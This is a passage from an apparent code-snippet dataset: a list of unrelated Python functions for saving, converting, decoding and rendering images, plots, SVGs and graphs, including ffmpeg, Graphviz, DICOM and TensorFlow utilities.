'mong.png',\n family='Noto Sans Mongolian', language='mn', vertical=True, rtl=False)", "def processIconFilename(self):\n\t\tself.iconFilename = self._getVal(64, 2)", "def make_image(self, frame, filename, **kwds):\n p = plot.plot(frame, **kwds)\n p.save_image(filename)", "def convert_gif(ctx):\n ctx.run(\n 'ffmpeg '\n '-i resources/demo.mkv -filter_complex \"[0:v] palettegen\" '\n 'resources/palette.png',\n pty=True\n )\n ctx.run(\n 'ffmpeg -i resources/demo.mkv '\n '-i resources/palette.png '\n '-filter_complex \"[0:v][1:v] paletteuse\" '\n 'resources/demo.gif',\n pty=True\n )", "def write(self, symFile):\n logging.debug(\"Writing Symbol \"+self.name)\n for polygon in self.polygons:\n symFile.write(polygon.symRep())\n for wire in self.wires:\n symFile.write(wire.symRep())\n for text in self.texts:\n symFile.write(text.symRep())\n for pin in self.pins:\n symFile.write(pin.symRep())\n for circle in self.circles:\n symFile.write(circle.symRep())\n for rectangle in self.rectangles:\n symFile.write(rectangle.symRep())", "def handle_as_file(view: View, point: int, string: str):\n # \"screenshot.png\"\n\n name = osp.basename(string)\n file, folder = get_file(view, string, name)\n\n # if file doesn't exist, return\n if not osp.isfile(file):\n return\n\n # does the file need conversion ?\n need_conversion = file.endswith(FORMAT_TO_CONVERT)\n\n # if the file needs conversion, convert it and read data from the resulting png\n if need_conversion:\n # keep the image's file and name for later use\n conv_file = file\n conv_name = name\n\n # create a temporary file\n tmp_file = osp.join(TEMP_DIR, \"tmp_png.png\")\n name = osp.splitext(name)[0] + \".png\"\n\n # use the magick command of Imagemagick to convert the image to png\n magick(file, tmp_file)\n\n file = tmp_file\n\n with open(file, \"rb\") as f:\n encoded = str(base64.b64encode(f.read()), \"utf-8\")\n\n real_width, real_height, size = get_image_size(file)\n width, height = get_dimensions(view, file)\n size = str(size // 1024) + \"KB\" if size >= 1024 else str(size) + 'B'\n\n def on_navigate(href):\n\n if href == \"save\":\n if need_conversion:\n save(conv_file, conv_name, \"file\")\n else:\n save(file, name, \"file\", folder)\n elif href == \"save_as\":\n convert(conv_file if need_conversion else file, \"file\")\n else:\n sublime.active_window().open_file(file)\n\n view.show_popup(\n TEMPLATE % (width, height, \"png\", encoded, real_width,\n real_height, size),\n sublime.HIDE_ON_MOUSE_MOVE_AWAY,\n point,\n *view.viewport_extent(),\n on_navigate=on_navigate)", "def main():\n convert(\"env_100000.mp4\", TargetFormat.GIF)", "def save_to_image_file(self, filename, image_format='png', scale_x=1, scale_y=1):\n\n self.save_barcode_to_pillow(scale_x=scale_x, scale_y=scale_y).save(filename,\n format=image_format)", "def save_as_png(file_name, path = DEFAULT_PATH):\n plt.ioff()\n plt.savefig(path + file_name + '.png')\n plt.close()", "def postprocess_symbols(config: Config, symbols: SymbolDF) -> SymbolDF:\n files = []\n arms = []\n arm_symbols = {}\n current_file = ''\n current_arm = ''\n has_file = False\n if config['collect.prefix-file']:\n prefixes = config.get_re('collect.prefix')\n else:\n prefixes = None\n if 'type' in symbols.columns:\n for symbol in symbols.itertuples():\n if symbol.type == 'FILE':\n has_file = True\n current_file = symbol.symbol\n if prefixes:\n current_file = simplify_source(current_file, prefixes)\n\n elif symbol.type == 'NOTYPE':\n if symbol.symbol.startswith('$'):\n if current_arm or symbol.symbol in ARM_SPECIAL_SYMBOLS:\n current_arm = symbol.symbol\n arm_symbols[current_arm] = True\n files.append(current_file)\n arms.append(current_arm)\n\n if has_file:\n symbols['file'] = files\n if current_arm:\n symbols['arm'] = arms\n\n if has_file:\n symbols = symbols[symbols['type'] != 'FILE']\n if current_arm:\n syms = arm_symbols.keys()\n symbols = symbols[~symbols.symbol.isin(syms)]\n return symbols", "def do_icon(srcfn, magnitude):\n img = Image.open(\"%s.png\" % (srcfn, ))\n draw = ImageDraw.Draw(img)\n (width, _height) = FONT.getsize(magnitude)\n # 40 pixel wide, we want to center it\n x0 = int(20 - (width / 2.))\n draw.text((x0, 8), magnitude, font=FONT, fill=(0, 0, 0, 255))\n img.save((\"../../htdocs/icons/lsr/%s/%s.png\"\n ) % (srcfn, magnitude))\n del img\n del draw", "def process(self, image):", "def decode(n_pir,template,localtime,draw,bin_display):\n template_filename=template+\"%02d\"\n\n for n in range(n_pir):\n decode_in_file=template_filename%(n+1)\n decode_out_file=decode_in_file+\"_parsed.txt\"\n click.echo(\"Working on file: %s\"%decode_out_file)\n buff_size=8\n try:\n with open(decode_in_file,'rb') as i: #\n with open(decode_out_file,'w') as o:\n #Header\n o.write('Time,Status\\n')\n while True:\n anteroom=i.read(buff_size)\n if anteroom==b'':\n break\n anteroom_tuple=struct.unpack('=If',anteroom)\n time_=anteroom_tuple[0]\n status=anteroom_tuple[1]\n if localtime:\n time_=time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(time_))\n o.write('%s,%f\\n'%(time_,status))\n else:\n o.write('%i,%f\\n'%(time_,status))\n except FileNotFoundError:\n continue\n if draw:\n actogram(template_filename, n_pir, bin_display)", "def dofigure(line):\n global fnum\n if 'onlineonlycolor' not in line:\n fnum += 1\n locate = re.search(r\"\\{([\\w\\d\\-_]+)\\}\", line)\n if not locate:\n raise RuntimeError(\"Could not find image in line '{}'\".format(line))\n imagetext = locate.group(1)\n imname, ftype = findfigure(imagetext)\n if 'plottwo' in line:\n imname2 = line.split('{')[2].split('}')[0]\n # print name and number\n print(fnum+'a', imname)\n print(fnum+'b', imname2)\n _, subname = os.path.split(imname)\n _, subname2 = os.path.split(imname2)\n ftype = os.path.splitext(subname)\n # rename with number if desired\n subname = outfigname(fnum, ftype, char=\"a\")\n outname = os.path.join(outdir, subname)\n subname2 = outfigname(fnum, ftype, char=\"b\")\n outname2 = os.path.join(outdir, subname2)\n # copy over\n os.system(\"cp \"+imname+\" \"+outname)\n os.system(\"cp \"+imname2+\" \"+outname2)\n # write out plot string\n newline = line.replace(imagetext, subname)\n newline = newline.replace(imname2, subname2)\n else:\n # print name and number\n print(fnum, imname)\n _, subname = os.path.split(imname)\n # rename with number if desired\n subname = outfigname(fnum, ftype)\n outname = os.path.join(outdir, subname)\n # copy over\n os.system(\"cp \"+imname+\" \"+outname)\n # write out plot string\n newline = line.replace(imagetext, subname)\n return(newline)", "def render(filename,i):\n print('running render')\n A = np.genfromtxt(filename,skip_header=1,dtype=float,delimiter=',')\n img = np.array(A[i,:],copy=True)\n print(img.shape)\n img = img.reshape(28,28)\n img = 255 - img\n print(img.shape)\n plt.imshow(img, cmap=\"gray\", vmin=0, vmax=255)\n plt.savefig(\"img\" + str(i)+\"render\"+ \".png\")", "def create_png(dotfile=\"tree.dot\", pngfile=\"tree.png\"):\n dotfile = utils.get_abspath(dotfile)\n pngfile = utils.get_abspath(pngfile)\n cmd = create_cmd(dotfile, pngfile)\n subprocess.run(cmd, check=True)", "def save_plot(p, file_name, path='../static/images/'):\n p.output_backend = \"svg\"\n export_svgs(p, filename=path + file_name + '.svg')", "def toPng(self):\n\t\tif self.isPng:\n\t\t\treturn self\n\t\telse:\n\t\t\treturn textureFile( self.path.replace( self.extension, '.png' ) )", "def generate(self, chars, format='png'):\n im = self.generate_image(chars)\n out = BytesIO()\n im.save(out, format=format)\n out.seek(0)\n return out", "def draw(self, output_file):\n self.calc_width()\n self.calc_height()\n\n surface = cairo.SVGSurface(output_file, self.width, self.height)\n ctx = cairo.Context(surface)\n\n ## change background color\n ctx.rectangle(0, 0, self.width, self.height)\n ctx.set_source_rgb(1, 1, 1)\n ctx.fill()\n\n ## Variables\n line_spacing = 125\n line_depth = 125\n header_depth = 75\n left_spacing = 35\n\n ## Create custom color palette\n color_palette = [[],[],[]]\n num_colors_per = self.number_of_motifs//3\n max_num_colors_per = self.number_of_motifs - (2 * num_colors_per)\n gradient = 1/num_colors_per\n max_gradient = 1/max_num_colors_per\n # color_gradient_value = \n for i in range(3):\n if i == 2:\n for k in range(1,max_num_colors_per + 1):\n color_palette[i].append(k*max_gradient)\n else:\n for k in range(1,num_colors_per + 1):\n color_palette[i].append(k*gradient)\n # print(max_num_colors_per)\n # print(color_palette)\n\n\n ## Legend\n x_legend = self.width - self.width_of_legend\n y_legend = 75\n legend_width = 145\n legend_height = (self.number_of_motifs * 15) + 8\n ctx.rectangle(x_legend,y_legend,legend_width,legend_height)\n ctx.set_source_rgb(0,0,0)\n ctx.stroke()\n legend_line_length = 35\n count = 1\n for i in range(3):\n for j in range(len(color_palette[i])):\n ctx.move_to(x_legend + 5, y_legend + (count*15))\n ctx.line_to(x_legend + legend_line_length, y_legend + (count*15))\n if i == 0:\n ctx.set_source_rgb(color_palette[i][j],0,0)\n if i == 1:\n ctx.set_source_rgb(0,color_palette[i][j],0)\n if i == 2:\n ctx.set_source_rgb(0,0,color_palette[i][j])\n ctx.set_line_width(3)\n ctx.stroke()\n\n ctx.move_to((x_legend + legend_line_length) + 10, y_legend + (count*15))\n ctx.set_font_size(11)\n ctx.select_font_face(\"Arial\",cairo.FONT_SLANT_NORMAL,cairo.FONT_WEIGHT_NORMAL)\n ctx.set_source_rgb(0,0,0)\n ctx.show_text(self.list_of_motifs[count-1])\n\n count += 1\n\n for i in range(len(self.list_of_motif_objects)):\n current_motif_obj = self.list_of_motif_objects[i]\n current_length_of_seq = len(current_motif_obj.sequence)\n current_motif_coords = current_motif_obj.motif_coordinates\n current_motif_sequences = current_motif_obj.motif_sequences\n current_exon_coords = current_motif_obj.exon_coordinates\n\n width_left = self.width - current_length_of_seq - self.width_of_legend\n \n ## Draw main sequence line\n ctx.move_to(left_spacing,(i*line_spacing) + line_depth) \n ctx.line_to(left_spacing + current_length_of_seq,(i*line_spacing) + line_depth)\n ctx.set_source_rgb(0,0,0)\n ctx.set_line_width(2)\n ctx.stroke()\n\n ## Draw the exon\n x1 = left_spacing + current_exon_coords[0][0]\n y1 = (i*line_spacing) + line_depth - 20\n rec_width = current_exon_coords[0][1] - current_exon_coords[0][0]\n rec_height = 40\n ctx.rectangle(x1,y1,rec_width,rec_height)\n ctx.set_source_rgb(0,0,0)\n ctx.stroke()\n\n ## Loop to draw all motifs\n for j in range(len(current_motif_coords)):\n ctx.move_to(left_spacing + current_motif_coords[j][0],(i*line_spacing) + line_depth) \n ctx.line_to(left_spacing + current_motif_coords[j][0] + 2,(i*line_spacing) + line_depth)\n motif_num = current_motif_coords[j][2]\n if(motif_num < num_colors_per):\n ctx.set_source_rgb(color_palette[0][motif_num],0,0)\n if(motif_num >= num_colors_per and motif_num < (2*num_colors_per)):\n ctx.set_source_rgb(0,color_palette[1][motif_num-num_colors_per],0)\n if(motif_num >= (2*num_colors_per)):\n ctx.set_source_rgb(0,0,color_palette[2][motif_num-(2*num_colors_per)])\n ctx.set_line_width(15)\n ctx.stroke()\n\n ## adding header text\n ctx.move_to(left_spacing, (i*line_spacing) + header_depth)\n ctx.set_font_size(17)\n ctx.select_font_face(\"Arial\",cairo.FONT_SLANT_NORMAL,cairo.FONT_WEIGHT_NORMAL)\n ctx.set_source_rgb(0,0,0)\n ctx.show_text(current_motif_obj.header)\n\n # ## adding sequence text (MAYBE MAKE THIS OPTIONAL FLAG?)\n # disp_length = 80\n # last_k = 0\n # for k in range(len(current_motif_obj.sequence)//disp_length):\n # current_seq = current_motif_obj.sequence[k*disp_length:(k*disp_length)+disp_length]\n # ctx.move_to(50, (i*512) + 125 + (25*k))\n # ctx.set_font_size(14)\n # ctx.select_font_face(\"Arial\",cairo.FONT_SLANT_NORMAL,cairo.FONT_WEIGHT_NORMAL)\n # ctx.set_source_rgb(0,0,0)\n # ctx.show_text(current_seq)\n # last_k = k\n # final_num = ((len(current_motif_obj.sequence)//disp_length)*disp_length)\n # the_rest = current_motif_obj.sequence[final_num:]\n # ctx.move_to(50, (i*512) + 125 + (25*(last_k + 1)))\n # ctx.set_font_size(14)\n # ctx.select_font_face(\"Arial\",cairo.FONT_SLANT_NORMAL,cairo.FONT_WEIGHT_NORMAL)\n # ctx.set_source_rgb(0,0,0)\n # ctx.show_text(the_rest)\n\n\n\n surface.finish()", "def ps2svg(sFile, method=\"default\"):\n\n sBack = \"\"\n oErr = ErrHandle()\n try:\n # Read the file\n sText = \"\"\n with open(sFile, \"r\") as f:\n sText = f.read()\n if method == \"default\":\n sBack = ps2svg_string(sText)\n elif method == \"simple\":\n sBack = ps2svg_simple(sText)\n except:\n msg = oErr.get_error_message()\n oErr.DoError(\"ps2svg\")\n\n # Return what we have gathered\n return sBack", "def create_raster_datapackage(pk_type, path, file_flag, out_path):\n process_source(pk_type, path, file_flag, out_path)", "def iter_png(path: str, translate: bool = True, verify_crc: bool = True) -> Iterator[tuple]:\n\n with open(path, \"rb\") as fr:\n yield from iter_png_fp(fr, translate=translate, verify_crc=verify_crc)", "def _parse_single(filename, label, image_size=IMAGE_SIZE):\n # Decode and convert image to appropriate type\n image = tf.image.decode_png(tf.read_file(filename), channels=image_size[2])\n image = tf.image.convert_image_dtype(image, tf.float32) # Also scales from [0, 255] to [0, 1)\n # Resize according to module requirements\n image = tf.image.resize_images(image, image_size[:2])\n return image, label", "def saving(file_path, file_type='png'):\n\n index_saving = 1\n while os.path.exists(file_path + \"_{}.{}\".format(index_saving, file_type)):\n index_saving += 1\n\n plt.savefig(file_path + \"_{}.{}\".format(index_saving, file_type))", "def save_as_png(path):\r\n for _, _, filename in walk(path):\r\n for f in filename:\r\n medical_image = pydicom.dcmread(path + f)\r\n shape = medical_image.pixel_array.shape\r\n # Convert to float to avoid overflow or underflow losses\r\n brain_image = medical_image.pixel_array.astype(float)\r\n # Rescaling grey scale between 0-255\r\n scaled_image = (np.maximum(brain_image, 0) / brain_image.max()) * 255.0\r\n # Convert to uint\r\n scaled_image = np.uint8(scaled_image)\r\n # Write the PNG file\r\n with open(f'{path}png/{f.strip(\".dcm\")}.png', 'wb') as png_file:\r\n w = png.Writer(shape[1], shape[0], greyscale=True)\r\n w.write(png_file, scaled_image)", "async def api_faviconPng(self):\n # SECURITY: We control the path of the file so using send_file is ok.\n return self.reply_file(\n sirepo.resource.static(\"img\", \"favicon.png\"),\n content_type=\"image/png\",\n )", "def saveGraph (self, filename) :\n\t\tss = \"digraph {\\n\"\n\t\tfor key, rules in self.production_rules.items() :\n\t\t\tfor rule in rules :\n\t\t\t\tr = [op.val for op in rule]\n\t\t\t\tr = [i.replace (\"-\", \"\") for i in r]\n\t\t\t\tr = [i.replace (\".\", \"\") for i in r]\n\t\t\t\tr = [i.replace (\"\\'\\'\", \"eps\") for i in r]\n\t\t\t\tr = [i.replace (\"\\\"\\\"\", \"eps\") for i in r]\n\t\t\t\tr = [i.replace (\"/\", \"_\") for i in r]\n\t\t\t\tk = key.replace (\"-\", \"\")\n\t\t\t\tk = k.replace (\"/\", \"_\")\n\t\t\t\tk = k.replace (\".\", \"_tok\")\n\t\t\t\tss += \"\\t\" + k + \" -> \" \n\t\t\t\tss += \" -> \".join (r)\n\t\t\t\tss += \" ;\\n\"\n\t\tss += \"}\"\n\t\tfilestream = open (filename + '.dot', 'w') \n\t\tfilestream.write(ss)\n\t\tfilestream.close ()\n\t\tcmd = 'dot -Tpng -o ' + filename + '.png ' + filename + '.dot'\n\t\tos.system (cmd)\n\t\tcmd = 'rm ' + filename + '.dot'\n\t\tos.system (cmd)", "def map_fn(self, path, label):\n image = tf.image.decode_png(tf.io.read_file(path))\n image = tf.image.convert_image_dtype(image, tf.float32)\n if self.img_size is not None:\n image = tf.image.resize(image, self.img_size)\n return image, label", "def OnBuildPNGs(self, e):\n if (not defaults.use_tex):\n msg = \"LaTeX is disabled in the defaults.py file. To use this functionality, change the\"\n msg += \" use_tex option to True and restart the GUI.\"\n ShowMessage(msg, kind='warn')\n return\n question = \"Quantity code formulas are displayed using PNG images, which need to be generated.\"\n question += \"\\n\\n\\nImages should only be generated if they do not already exist or\"\n question += \" the quantity codes have changed, e.g., more custom outputs have been added.\"\n question += \"\\n\\n\\nThis can take ~60 sec, do you want to proceed?\"\n proceed = AskYesNo(question, title='Generate LaTeX Formula Images?')\n if (not proceed): return\n\n question = \"Choose a path where the images will be saved. The default value from defaults.py is shown.\"\n path = AskText(question, default=defaults.quantity_code_image_path, title=\"Where to store images?\")\n if (path is None): return\n defaults.quantity_code_image_path = path # user overrode this quantity, remember for later\n\n question = \"If image files already exist, do you want to overwrite them?\"\n overwrite = AskYesNo(question, title='Overwrite Existing Files?')\n\n # call render routine and display a progress bar\n Nq = len(self.mainparent.nmlpanel.output_quantities.quantities)\n offsets = list(self.mainparent.nmlpanel.output_quantities.offsets.keys())\n\n P = ProgressBar(Nq)\n P(0)\n for i,Q in enumerate(self.mainparent.nmlpanel.output_quantities.quantities):\n if (Q.name in offsets): continue\n render_tex(Q.code, Q.tex, defaults.quantity_code_image_path, overwrite=overwrite)\n\n P(i+1) # update progress bar", "def import_reference_images():\n symbols = []\n my_path = os.getcwd()\n my_path = my_path.replace('DIP_drivers', 'references\\\\')\n symbols_list = [f for f in listdir(my_path) if '.jpg' in str(f)]\n\n for image in symbols_list:\n path = my_path + image\n gray_image = cv2.imread(path, 0)\n ret, gray_image = cv2.threshold(gray_image, 100, 255, cv2.THRESH_TRUNC)\n\n img = Symbol(gray_image, image)\n symbols.append(img)\n return symbols", "def save(self, *args, **kwargs):\n if self.icon:\n xml = svg.validate_svg(self.icon.file.read())\n square = svg.make_square(xml)\n colors = svg.color_icon(square)\n super(Issue, self).save(*args, **kwargs)\n for key, content in colors.items():\n filename = self.icon_color(key)\n if self.icon.storage.exists(filename):\n self.icon.storage.delete(filename)\n self.icon.storage.save(filename, svg.as_file(content))\n else:\n super(Issue, self).save(*args, **kwargs)", "def process():\r\n st.title(\"Process in GauGAN\")\r\n st.subheader(\"Now choose the styles you wish to process with the paintings.\")\r\n\r\n # Styles dictionary\r\n styles_dict = {\"Afternoon 1\": 1, \"Afternoon 2\": 2, \"Sunset 1\": 3,\r\n \"Sunset 2 Red Sun\": 4, \"Afternoon 3\": 5, \"Afternoon 4\": 6, \"Sunset 3\": 7,\r\n \"Sunset 4\": 8, \"Sunset 5\": 9, \"Sunset 6\": 10}\r\n\r\n # Allow the user to choose the keys from the styles dictionary\r\n styles = st.multiselect(\"Styles: \",list(styles_dict.keys()),\"Afternoon 1\")\r\n\r\n # set the directory where the pictures will be imported from\r\n DIR = 'tmp/'\r\n # Calculate the number of files that are going to be processed\r\n number_of_files = len([name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))])\r\n # Show it in the sidebar\r\n st.sidebar.subheader(\"Total pictures to process: %s\"%number_of_files)\r\n # If the user has chosen to process them:\r\n if st.button(\"Start processing with GauGAN\"):\r\n if number_of_files > 0:\r\n # Then process it: take the directory where the going-to-be-imported pictures exist,\r\n # Process them, and save them in 'files' directory.\r\n make_nature(styles_dict,DIR[:-1],'files',styles)\r\n else: # the number of files is zero\r\n st.warning(\"There are no files to process.\")", "def generate_art(filename, x_size=350, y_size=350):\n # Functions for red, green, and blue channels - where the magic happens!\n r_lb = random.randint(6, 10)\n g_lb = random.randint(6, 10)\n b_lb = random.randint(6, 10)\n red_function = build_random_function(r_lb, r_lb+1)\n green_function = build_random_function(g_lb, g_lb+1)\n blue_function = build_random_function(b_lb, b_lb+1)\n\n # Create image and loop over all pixels\n im = Image.new(\"RGB\", (x_size, y_size))\n pixels = im.load()\n for i in range(x_size):\n for j in range(y_size):\n x = remap_interval(i, 0, x_size, -1, 1)\n y = remap_interval(j, 0, y_size, -1, 1)\n pixels[i, j] = (\n color_map(evaluate_random_function(red_function, x, y)),\n color_map(evaluate_random_function(green_function, x, y)),\n color_map(evaluate_random_function(blue_function, x, y))\n )\n im.save(filename+'.png')\n return 'saved'", "def image(self, path):\n im = Image.open(path).convert(\"RGB\")\n # Convert the RGB image in printable image\n self._convert_and_print_image(im)", "def handle_as_file(view: sublime.View, point: int, string: str):\n\n name = osp.basename(string)\n file, folder = get_file(view, string, name)\n\n # if file doesn't exist, return\n if not osp.isfile(file):\n return\n\n # does the file need conversion ?\n need_conversion = file.endswith(formats_to_convert)\n ext = name.rsplit('.', 1)[1]\n\n # if the file needs conversion, convert it and read data from the resulting png\n if need_conversion:\n ext = \".png\"\n # keep the image's file and name for later use\n conv_file = file\n\n # create a temporary file\n temp_png = osp.join(TEMP_DIR, \"temp_png.png\")\n\n # use the magick command of Imagemagick to convert the image to png\n magick(file, temp_png)\n\n file = temp_png\n\n with open(file, \"rb\") as img:\n encoded = str(base64.b64encode(img.read()), \"utf-8\")\n\n width, height, real_width, real_height, size = get_data(view, file)\n\n def on_navigate(href):\n\n if href == \"save\":\n if need_conversion:\n save(conv_file, name, \"file\")\n else:\n save(file, name, \"file\", folder)\n elif href == \"save_as\":\n convert(conv_file if need_conversion else file, \"file\")\n else:\n sublime.active_window().open_file(file)\n\n view.show_popup(\n TEMPLATE % (width, height, ext, encoded, real_width, real_height,\n str(size // 1024) + \"KB\" if size >= 1024 else str(size) + 'B'),\n sublime.HIDE_ON_MOUSE_MOVE_AWAY,\n point,\n *view.viewport_extent(),\n on_navigate=on_navigate)", "def output_quantized_to_palette(self, palette, filename):\n dist = euclidean_distances(\n palette.lab_array, self.lab_array, squared=True).T\n min_ind = np.argmin(dist, axis=1)\n quantized_lab_array = palette.lab_array[min_ind, :]\n img = lab2rgb(quantized_lab_array.reshape((self.h, self.w, self.d)))\n imsave(filename, img)", "def decode_file(source, palette):\n\n (CHRStart, CHRSize) = get_CHR_data_position(source)\n charRowCount = CHRSize // 256 # 16 characters/row\n\n img = Image.new(\"P\", (128, charRowCount * 8), 0)\n img.putpalette(itertools.chain.from_iterable(palette))\n\n source.seek(CHRStart)\n for (y, pixelRow) in enumerate(decode_pixel_rows(source, charRowCount)):\n for (x, value) in enumerate(pixelRow):\n img.putpixel((x, y), value)\n\n return img", "def convert_to_raw(file):\n\n img = Image.open(file)\n img = img.convert('L') # convert to 8 bits per pixels\n (x, y) = img.size\n\n pixels = bytearray(list(img.getdata()))\n\n filename, file_extension = os.path.splitext(file)\n file2 = file.replace(file_extension, '.dat')\n file_name = str(x) + 'x' + str(y) + 'x8x1' + '_' + file2\n\n # print(file_name)\n\n with open(file_name, 'wb') as f:\n f.write(pixels)\n\n return file_name", "def create_png(input_filename, output_filename_w, output_filename_s, image_width, image_height, fft_size, f_max, f_min, wavefile, palette, channel):\n \n print \"processing file %s:\\n\\t\" % input_file,\n \n audio_file = audiolab.sndfile(input_filename, 'read') #opens the wavfile; audio_file is an object now\n \n samples_per_pixel = audio_file.get_nframes() / float(image_width)\n nyquist_freq = (audio_file.get_samplerate() / 2) + 0.0\n \"\"\"\n Initializes AudioProcessor class, which does FFT analysis and spits \n out amplitudes and frequencies to the SpectrogramImage and WaveformImage \n classes below later. For a stereo wav file, this selects a single channel \n to analyze. We might want to analyze both channels to give more input to\n the visualizer,though.\n \"\"\"\n processor = AudioProcessor(audio_file, fft_size, channel, numpy.hanning)\n \n if wavefile==1:\n waveform = WaveformImage(image_width, image_height, palette)\n spectrogram = SpectrogramImage(image_width, image_height, fft_size, f_max, f_min, nyquist_freq, palette)\n \n for x in range(image_width):\n #shows progress\n if x % (image_width/10) == 0:\n sys.stdout.write('.')\n sys.stdout.flush()\n \n seek_point = int(x * samples_per_pixel)\n next_seek_point = int((x + 1) * samples_per_pixel)\n \n (spectral_centroid, db_spectrum) = processor.spectral_centroid(seek_point)\n \n #let's have a look at the spectral centroid and the db_spectrum\n #print \"Spectral Centroid:\" + str(spectral_centroid)\n #print \"DB Spectrum:\" + str(db_spectrum)\n \n if wavefile==1:\n #aha! The peaks and spectral centroid make up the waveform.\n #Since the spectral centroid indicates timbre (often referred to as color),\n #it's probably what colors the waveform.\n peaks = processor.peaks(seek_point, next_seek_point)\n #let's have a look at these peaks\n #print \"Peaks:\" + str(peaks)\n waveform.draw_peaks(x, peaks, spectral_centroid)\n \n spectrogram.draw_spectrum(x, db_spectrum)\n \n if wavefile==1:\n waveform.save(output_filename_w)\n spectrogram.save(output_filename_s)\n \n print \" done\"", "def post_process_svg(self):\n post_processor = PostProcessor(svg_path=self.rendered_file_path)\n\n post_processor.post_process(graph_representation=self.graph_representation)\n\n post_processor.write()\n\n self.display.display(\"The graph has been exported to {}\".format(self.rendered_file_path))\n\n return self.rendered_file_path", "def copy_png_fp(\n fin: IO[bytes], fout: IO[bytes], filter_chunks: Optional[Callable[[bytes], bool]] = None, verify_crc: bool = False\n) -> None:\n\n filter_chunks = filter_chunks or (lambda chunk_type: True)\n\n for length, chunk_type, chunk, crc in iter_png_fp(fin, translate=False, verify_crc=verify_crc):\n if filter_chunks(chunk_type):\n fout.write(length)\n fout.write(chunk_type)\n fout.write(chunk)\n fout.write(crc)", "def save_png(self, filename):\n post_script = self.canvas.postscript().encode()\n img = Image.open(io.BytesIO(post_script))\n img.save(filename, format=\"PNG\")", "def export_graph(graph, name_file, format_export):\n im_name = ('{}.' + format_export).format('./' + name_file)\n if (format_export == \"png\"):\n graph.write_png(im_name)\n elif (format_export == \"dot\"):\n graph.write_dot(im_name)\n else:\n raise LookupError", "def on_pushButton_2_clicked(self):\n # TODO: not implemented yet\n try:\n str='str.png'\n process_pic.graphics ().process (str)\n self.click=\"process\"\n pixMap = QPixmap(\"temp.png\").scaled(self.label.width(),self.label.height())\n self.label.setPixmap(pixMap)\n except:\n button=QMessageBox.about(self, '注意', '应先向空白处导入图片后再进行处理')\n else:\n pass\n\n\n\n #os.popen('python process_pic.py')", "def image(self):\n # TODO: make sure this method works for png, gif, tiff\n if self.has_metadata:\n self.extract_metadata()\n tempdir_path = self.make_tempdir()\n tempfile_path = os.path.join(tempdir_path, self.filename)\n warnings.simplefilter('error', Image.DecompressionBombWarning)\n try: # Do image conversions\n img_in = Image.open(self.src_path)\n img_out = Image.frombytes(img_in.mode, img_in.size, img_in.tobytes())\n img_out.save(tempfile_path)\n self.src_path = tempfile_path\n except Exception as e: # Catch decompression bombs\n # TODO: change this from all Exceptions to specific DecompressionBombWarning\n self.add_error(e, \"Caught exception (possible decompression bomb?) while translating file {}.\".format(self.src_path))\n self.make_dangerous()\n self.add_file_string('Image file')\n self.set_property('processing_type', 'image')", "def write(self, chars, output, format='png'):\n im = self.generate_image(chars)\n return im.save(output, format=format)", "def generate_art(filename, x_size=350, y_size=350):\n # Functions for red, green, and blue channels - where the magic happens!\n \n red_function = build_random_function(7,15)\n green_function = build_random_function(7,15)\n blue_function = build_random_function(7,15)\n \n # Create image and loop over all pixels\n im = Image.new(\"RGB\", (x_size, y_size))\n pixels = im.load()\n for i in range(x_size):\n for j in range(y_size):\n x = remap_interval(i, 0, x_size, -1, 1)\n y = remap_interval(j, 0, y_size, -1, 1)\n pixels[i, j] = (\n color_map(evaluate_random_function(red_function, x, y)),\n color_map(evaluate_random_function(green_function, x, y)),\n color_map(evaluate_random_function(blue_function, x, y))\n )\n\n im.save(filename)", "def main():\n p = argparse.ArgumentParser(description='Convert images into unicode')\n p.add_argument('image', metavar='<path>', type=str,\n help='path to the file, use - for stdin')\n p.add_argument('--no-x256', action='store_false', dest='x256', default=True,\n help='prints with x256 unicode coloring')\n p.add_argument('--char-set', metavar='<name>', default='default',\n help='prints with character set (e.g. windows)')\n args = p.parse_args()\n print_image_as_unicode(args.image, char_set=CHAR_SETS[args.char_set],\n x256=args.x256)", "def _process_image(filename, coder):\n # Read the image file.\n with tf.gfile.FastGFile(filename, 'rb') as f:\n image_data = f.read()\n \n # Convert any PNG to JPEG's for consistency.\n if _is_png(filename):\n print('Converting PNG to JPEG for %s' % filename)\n image_data = coder.png_to_jpeg(image_data)\n # Decode the RGB JPEG.\n image = coder.decode_jpeg(image_data)\n\n # Check that image converted to RGB\n assert len(image.shape) == 3\n height = image.shape[0]\n width = image.shape[1]\n assert image.shape[2] == 3\n\n return image_data, height, width", "def ExtractIconReps(icon_file_name):\n with open(icon_file_name, \"r\") as icon_file:\n icon_file_contents = icon_file.readlines()\n\n current_icon_size = REFERENCE_SIZE_DIP\n icon_sizes = []\n current_icon_representation = []\n icon_representations = {}\n for line in icon_file_contents:\n # Strip comments and empty lines.\n line = line.partition(CPP_COMMENT_DELIMITER)[0].strip()\n if not line:\n continue\n # Retrieve sizes specified by CANVAS_DIMENSIONS to ensure icons are added in\n # sorted order by size descending.\n if line.startswith(CANVAS_DIMENSIONS):\n sizes = re.findall(r\"\\d+\", line)\n if len(sizes) != 1:\n Error(\"Malformed {} line in {} - it should specify exactly one size.\"\n .format(CANVAS_DIMENSIONS, icon_file_name))\n icon_sizes.append(int(sizes[0]))\n\n # All icons except the first / default icon must start with\n # \"CANVAS_DIMENSIONS\", so rely on it here as a icon delimiter.\n if current_icon_representation:\n icon_representations = AddIconToDictionary(\n icon_file_name, current_icon_representation, current_icon_size,\n icon_representations)\n current_icon_representation = []\n current_icon_size = icon_sizes[-1]\n\n current_icon_representation.append(line)\n if current_icon_representation:\n icon_representations = AddIconToDictionary(\n icon_file_name, current_icon_representation, current_icon_size,\n icon_representations)\n\n if not icon_representations:\n Error(\"Didn't find any icons in {}.\".format(icon_file_name))\n\n if len(icon_representations) != len(icon_sizes):\n icon_sizes.insert(0, REFERENCE_SIZE_DIP)\n if sorted(icon_sizes, reverse=True) != icon_sizes:\n Error(\"The icons in {} should be sorted in descending order of size.\"\n .format(icon_file_name))\n return icon_representations", "def save(self, fileName=None):\n if fileName:\n pass\n else:\n fileName = 'scheme_part_{}.svg'.format(self._number_of_schemes)\n\n print('Scheme saved to the file {}'.format(fileName))\n plt.savefig(fileName)", "def write_map(self, file_name):\n\n if self.pixel == \"HEALPIX\":\n hp.fitsfunc.write_map(file_name, self.data, overwrite=True)\n if self.pixel == \"CAR\":\n enmap.write_map(file_name, self.data)", "def draw(dot_file_path, jupyter=True):\n s = gv.Source.from_file(dot_file_path)\n\n # using display(s) will draw the graph but will not embed it\n # permanently in the 